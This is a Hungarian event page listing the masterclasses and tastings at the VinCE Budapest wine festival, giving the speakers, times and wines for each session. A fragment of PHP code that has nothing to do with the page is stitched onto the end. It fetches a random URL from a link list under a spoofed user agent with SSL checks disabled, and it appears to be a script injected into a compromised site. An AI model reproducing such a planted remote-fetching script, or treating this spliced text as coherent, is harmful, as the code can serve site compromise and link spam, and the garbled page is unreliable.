Mesterkurzusok, workshopok


A VinCE Budapest rendezvényre minden jegy elkelt. Sem a helyszínen, sem online nem lehet jegyet vásárolni.

Kedves Vendégeink!
– Az előadásokhoz szinkrontolmácsokat és tolmácstechnikát biztosítunk.
– Előadásjegyeiket a korábban megvásárolt napijegyeikhez könnyedén hozzáadhatják a Jegyek menüpont alatt.
– A bejutás megkönnyítése végett javasoljuk, hogy a jegykollekciókat a Megjegyzés rovatban nevezzék el aszerint, hogy ki érkezik majd az adott jegyekkel.

Domaine-Laroche-Logo-CroppedChablis mesterkurzus a Domaine Laroche birtok boraival
Előadó: Gwenael Laroche
Péntek, 13.30–15.00, Mesterkurzusterem
A burgundiai Chablis mészköves talaja utánozhatatlan ásványosságot kölcsönöz a bornak, szinte a terroirt kortyoljuk! A mozaikszerűen, különböző talajtípusokból álló területekről érkező gyümölcsök (Chablis-ban chardonnay) borait izgalmas összehasonlítani. A mesterkurzust maga a tulajdonos, Madame Laroche tartja!

 

Francia borvidékek a Champagne-tól a Languedoc-ig 
Előadó: Pascal Bouvet
Péntek, 13.30-15.00, CH Workshopterem
Kép1

Számos francia előadásunk van, de ez a kóstoló abban különleges, hogy 10 bor kóstolása közben átszeljük Franciaországot, és a borok közvetítésével belekóstolhatunk a borbirodalom sokszínű kincseibe. A kiállításon résztvevő egy champagne-i, hat Rhône menti, egy Bandol régióbeli és egy languedoc-i bortermelő mutatja be régióját, valamint saját birtokát.
Az előadás után a földszinti Hársfateremben lehet folytatni a kóstolást és lehetőség nyílik a borászokkal való beszélgetésre.

Fedezze fel Kalifornia borait!
Előadó: Claudia Schug
Péntek, 15.30–17.00, Mesterkurzusterem
BuenaVista2Tudta, hogy Kalifornia gyakorlatilag a magyar Haraszthy Ágostonnak köszönheti, hogy borai vighírűek? Most kóstolhat is a Haraszthy által alapított Buena Vista pincészettől, de ott lesz a Gallo cégbirodalom trónörököse, Gina Gallo presztízspincészetének bora is (amely Robert Parker és a borszaklapo
k csodálatát is kivívta), és a Keresztapa rendezője, Coppola is képviselteti magát egy cabernet sauvignonnal. És hogy Kalifornia csak a nagytestű, nehéz vörösborokról szól? Az előadó családi pincészetének chardonnay-ja, a Buena Vista és Gina Gallo pinot noirja Kalifornia sokak számára ismeretlen, elegáns arcát mutatja majd!

Andreas WickoffPremium Estates of Austria
Előadó: Andreas Wickhoff MW
Péntek, 15.30–17.00, CH Workshopterem
A Premium Estates of Austria olyan birtokokat egyesít, akik egyrészt páratlan és kivételes minőségű borokat készítenek, másrészt szemléletük is hasonló. A kóstolón a tagok közül négy mesés osztrák pincészettől, köztük a pompás kamptali rajnai rizlingeket készítő biodinamikusan gazdálkodó Fred Loimertől ismerhetünk meg borokat. A négy pincészet: Heinrich (Burgenland), Loimer (Kamptal), Sattlerhof (Stájerország) és Wieninger (Bécs). Az előadást a fiatal ám annál tehetségesebb Andreas Wickhoff Master of Wine tartja, aki címe megszerzésekor a legfiatalabb mester volt.

chef1Gasztronómiai mesterkurzus borokkal
Péntek, 17.30–19.00, Mesterkurzusterem
Előadó: a chef még egyeztetés alatt
Még egyeztetünk, de az biztos, hogy szájtátva figyeljük majd, amint egy híres mesterszakács elkészíti izgalmas fogásait, aztán persze meg is kóstoljuk azokat – természetesen borokkal kísérve!

„Oscar-díjas” champagne-ok
Péntek, 17.30–19.00, CH Workshopterem
Márkus_GyörgyElőadók: Essi Avellan MW és Márkus György
Márkus György már tavaly is részt vett a Tom Stevenson nevével fémjelzett versenyen, a Champagne and Sparkling World Wine Championship nevű megmérettetésen, és nemrég bejelentették, hogy idén hivatalosan is tagja a pezsgők Oscarjait odaítélő zsűrinek! Márkus György neve ismert a francia régióban, bejáratos a legzárkózottabb pezsgőházakhoz is – jelen sorok írásakor is a birtokokat járja és kóstol… Előadásán a legjobb champagne-okból szemezgethetünk!

A chardonnay művészete – Champagne Ruinart
Előadó: Frédéric Panaïotis
ruinartSzombat, 9.30–11.00, Mesterkurzusterem
Hat champagne a világ első hivatalosan bejegyzett pezsgőházától maga a pincemester, azaz a chef du cave tolmácsolásában. A Ruinartnal különösen fontos a művészetek pártolása, illetve elsődleges fontosságú a chardonnay fajta – a mesterkurzuson pedig művészi szintre fejlesztett, chardonnay-ból készült pezsgőket kóstolhatunk, a Dom Ruinart évjáratos pezsgősorozatból is hármat, köztük egy 1996-os, magnumpalackos tételt!
http://www.vincemagazin.hu/2014/12/ruinart-champagne-legosibb-haza/

Újvilág – Új-Zéland
Szombat, 11.30–13.00, Mesterkurzusterem
anne_krebiehlElőadó: Anne Krebiehl MW
A Gyűrűk urának földje borban is mesés – talán nem mindenki tudja, hogy Új-Zélandon forgatták a híres és hosszú mozit. Master of Wine előadónk sokat utazott és dolgozott Új-Zélandon, rendszeresen publikál az ország borairól, szívéhez nagyon közeli a távoli ország. A borsor pedig távolról sem lesz szokványos, még új-zélandi pezsgőt is kóstolhatunk!

Château Pontet-Canet – TELT HÁZ!
Szombat, 11.30–13.00, CH Workshopterem
Melanie TesseronElőadó: Melanie Tesseron
Kóstolt már 11 bordeaux-i bort egy “szuper secondként” számontartott birtokról? Mi sem, éppen ezért nagyon várjuk a tulajdonosnő, Melanie Tesseron kóstolóját: Château Pontet-Canet 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009, 2010 és 2011.
(Már a várólistán is 20 név van, így további jelentkezéseket erre a kurzura sajnos nem tudunk fogadni).

Tokaj a mesterek szemével
Szombat, 13.30–15.00, Mesterkurzusterem
Előadók: Elizabeth Gabay MW, Caroline Gilby MW, Darrel JosephCarolineGilby
Mire képes Tokaj? Mennyire sokszínű ez a borvidék? 3 száraz, 3 késői szüretelésű és 3 aszúboron keresztül most nem mi mondjuk el, hanem külföldi szakértőket hallgatunk meg. A Tokaj Kereskedőház támogatásával megvalósuló mesterkurzusra már a válogatást is egy mester, Ronn Wiegand MW végezte. (A képen Caroline Gilby MW előadó.)

Két külföldi biodinamikus itthon
Szombat, 13.30–15.00, Mesterkurzusterem
Előadók: Angela Michlits, Ralf Wassmann
Ugyan mi késztethet kSomló copyülföldi borászokat arra, hogy Magyarországon indítsanak borászati vállalkozást? Alighanem a terroir. A villányi Wassmann pincészetet egy német házaspár vezeti organikus szemlélettel, a somlói Meinklang birtok területében pedig egy osztrák család látott fantáziát.

A nagy kihívás – felismeri ön a csúcsbort?
Szombat, 15.30–17.00, Mesterkurzusterem
Előadók: Elizabeth Gabay MW, Anne Krebiehl MW, Louise Sydbeck MW, Christopher Burr MW, RoIPad1msics László
Mi van a pohárban? A bordeaux-i Château Palmer? A toszkán ikon Tignanello? Vagy egy szupermarket saját válogatású bora a középső polcról? Próbálja ki magát, ígérjük, fájdalommentes lesz! Sőt… Minden résztvevő 12 bort kóstolhat, méghozzá vakon, vagyis úgy, hogy nem látszik a borból sem címke, sem kapszula, de még a palack formája sem. A közönség értékelésének átlagát minden bor után megmutatjuk, ahogy a panelben ülő mesterek átlagpontját is! Így ön rögtön láthatja, hogy saját pontszáma miként viszonyul a szakértők, illetve kóstolótársai pontszámaihoz.
A saját értékelőlapját mindenkinek elküldjük!

Alsace.jpg Egy új generációs elzászi borászat: Domain Loew
Szombat, 15.30–17.00, Workshopterem
Előadó: Etienne Loew
Elzász a különleges karakterű rizlingek és szürkebarátok földje, ásványos borai az értő borkedvelők kedvencei közt vannak. A fiatal Loew birtok tulajdonosában Elzász új oldalát ismerhetjük meg. A 7 bort tartalmazó borsor nemcsak azért izgalmas, mert dűlőszelektált, fantasztikus rajnai rizlingeket kóstolhatunk, hanem mert az itthon is népszerű – elsősorban friss fogyasztásra készült – fajták egészen új arcát ismerhetjük meg az elzászi muskotályt és fűszeres traminit kóstolva.

BálteremA Pannon Bormíves Céh csúcsborai
Szombat, 17.30–19.00, Workshopterem
Előadó: dr. Mészáros Gabriella
Mit szólna egy maratoni borkóstolóhoz, amelynek borsorában olyan nevek sorakoznak, mint Dúzsi, Frittmann, Gere, Jásdi, Takler, Vesztergombi? Az biztos, hogy ez a mesterkurzus nem 90 perces lesz. Hosszabb… A Pannon Bormíves Céh Magyarország ikonjait tömöríti, ők azok, akik Magyarország borászatának „új időszámítását” indították el a rendszerváltás utáni években. Tagjaik között számos Év bortermelője díjazott borász van, a kóstoló pedig páratlan lesz!

macaron2A világ legszebb reggelije – 10 méthode traditionelle pezsgő extrákkal
Vasárnap, 9.30–11.00, Mesterkurzusterem
Előadók: Essi Avellan MW, Frédéric Panaïotis, Christian Forget, Antonio Alvarez, Stefano Gava, Garamvári Vencel, Márkus György, Romsics László
Nem egy pezsgőmestert / pezsgőszakértőt ültetünk a pulpitusra, hanem mindjárt tízet! Mindannyian azt kapták feladatként, hogy mutassanak valami különlegeset. Lesz champagne, cava, olasz pezsgő, crémant és persze a hazai méthode traditionnelle-ek közül is kóstolhatunk! A panelben ott ül majd Essi Avellan MW, a világ talán legelismertebb női pezsgőszakértője, ő is megmutatja kedvenc pezsgőjét. Az előadáson a város talán legfinomabb macaronját is kóstolhatjuk a Chez Dodo jóvoltából!

rozéProvence visszanyeri lelkét – új trend
Vasárnap, 11.30–13.00, Mesterkurzusterem
Előadó: Louise Sydbeck MW
Louise Sydbeck MW nizzai luxusjachtoknak ad el borokat, tudja, „milyen boron él” egyik-másik filmsztár vagy mágnás. Most egy olyan oldalát mutatja meg Provence-nak, ami sokkal több a halvány, „kommersz” rozéknál. Szó lesz az egyre terjedő prémium rozék trendjéről – ott lesz a világ legdrágább rozéja is –, de kóstolhatunk gondosan elkészített, a terroirt tükröző provence-i fehér- és vörösborokat is!

gusbourneA Gusbourne story – egy brit pezsgő sikertörténete
Vasárnap, 11.30–13.00, CH Workshopterem
Előadó: Charlie Holland
A britek már nemcsak a Kate és William álompárra és futballcsapataikra büszkék, az angol pezsgő is nemzeti kincs, a Gusbourne pedig az egyik legkiemelkedőbb pezsgőpincészet. A délangol Kent megyében található pincészet 2010-ben debütált pezsgőivel, bár birtok létéről már 1410-ből is vannak dokumentumok. A kóstolót maga a pezsgőmester, Charlie Holland tartja, akit a világ legbefolyásosabb fiatal borászai közé soroltak 2014-ben.

Screen shot 2015-01-26 at 1.56.40 PMShiraz / syrah – a legbujább szőlőfajta
Vasárnap, 13.30–15.00, Mesterkurzusterem
Előadók: Christopher Burr MW, Marc Chapoutier
A szőlőfajtának semmi köze a perzsa Shiraz városához, mégis érezni véljük a buja fűszerességet, a mesés kelet fűszereit. Különleges fajta, és most lehetőségünk lesz elmerülni benne. A Rhone-völgy fő fajtája, nem véletlenül a legkülönlegesebb tételek innen érkeznek majd!

Beaujolais borai – Domaines Dominique Piron
Vasárnap, 13.30–15.00, CH Workshopterem
BeaujolaisElőadó: Dominique Piron
Beaujolais elsősorban zajos és népszerű újborkampányáról híres, pedig a borvidék sokkal többet tud a banánillatú boroknál. A fő szőlőfajta a gamay – amit egykor a hunok vittek Burgundiába Horvátországból –, és nemcsak frissen fogyasztható, hanem érlelésre is alkalmas. Dominique Piron már a 14. borászgeneráció az 1590-es születésű ősrokon óta! Dominique a fenntartható borászkodás híve, elegáns borai már 30 országban kaphatók.

Teenage (Wine) Dream
Vasárnap, 15.30–17.00, Mesterkurzusterem
FiatalokElőadó: Romsics László és vendégei
Romsics László nemcsak borszakértő, hanem két nagylány édesapja is, ahogy Mészáros Gabriella és Németh Ágnes is szülők. A fiatalok bizony hatással vannak egymásra – ugye nem akarja, hogy gyermekét barátai rémes italokkal kínálják? Legyen inkább az ön (természetesen nagykorú) gyermeke az, aki barátait „megtéríti” a minőségi borhoz. Mi ehhez az ifjúságnak ingyen belépőt és izgalmas vendégeket kínálunk! Ha önök feleségével / férjével vasárnapi belépőt vásároltak, és van egy 18–22 év körüli gyermekük, írjon nekünk, és a fiatal jegyét mi álljuk! Sőt, mellé mindhármuknak belépőt adunk a nem mindennapi, fellépőkkel tarkított kóstolóra!

cahorsCahors – a francia malbec vidéke
Vasárnap, 15.30–17.00, CH Workshopterem
Előadó: Armand De Gerard
Tavaly egy kis teremben jutott hely a kuriózumnak számító, testes malbec-jeiről híres Cahors borvidék kóstolójának. Idén közkívánatra újra eljönnek hozzánk! Az előadást a borvidéket összefogó Vins de Cahors képviselője tartja.

Egzotikus ételek és borok: az ismeretlen Azerbajdzsán
Vasárnap, 17.30–19.00, Mesterkurzusterem
El58765_Darrel_Josephőadó: Darrel Joseph
Darrel Joseph amerikai szakértő már többször tesztelt velünk, sokan ismerik, azt azonban kevesen tudják, hogy Darrel a kelet-európai borok szakértője. Most továbbment, és az alig ismert Azerbajdzsánban járt, ahol lenyűgözte őt az azeri borok reneszánsza. Most az egzotikus ország borait és ételeit mi is megkóstolhatjuk.

Gancia olasz pezsgőkóstoló
ganciaVasárnap, 17.30–19.00, CH Workshopterem
Előadó: Massimiliano Gancia
A masszív, háromnapos kóstolót egy könnyed olasz pezsgőzéssel zárhatjuk le, az olasz pezsgők közt való barangolásunkhoz pedig a Gancia pezsgőház márkamenedzsere, Massimiliano Gancia lesz a kalauzunk.

 


html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>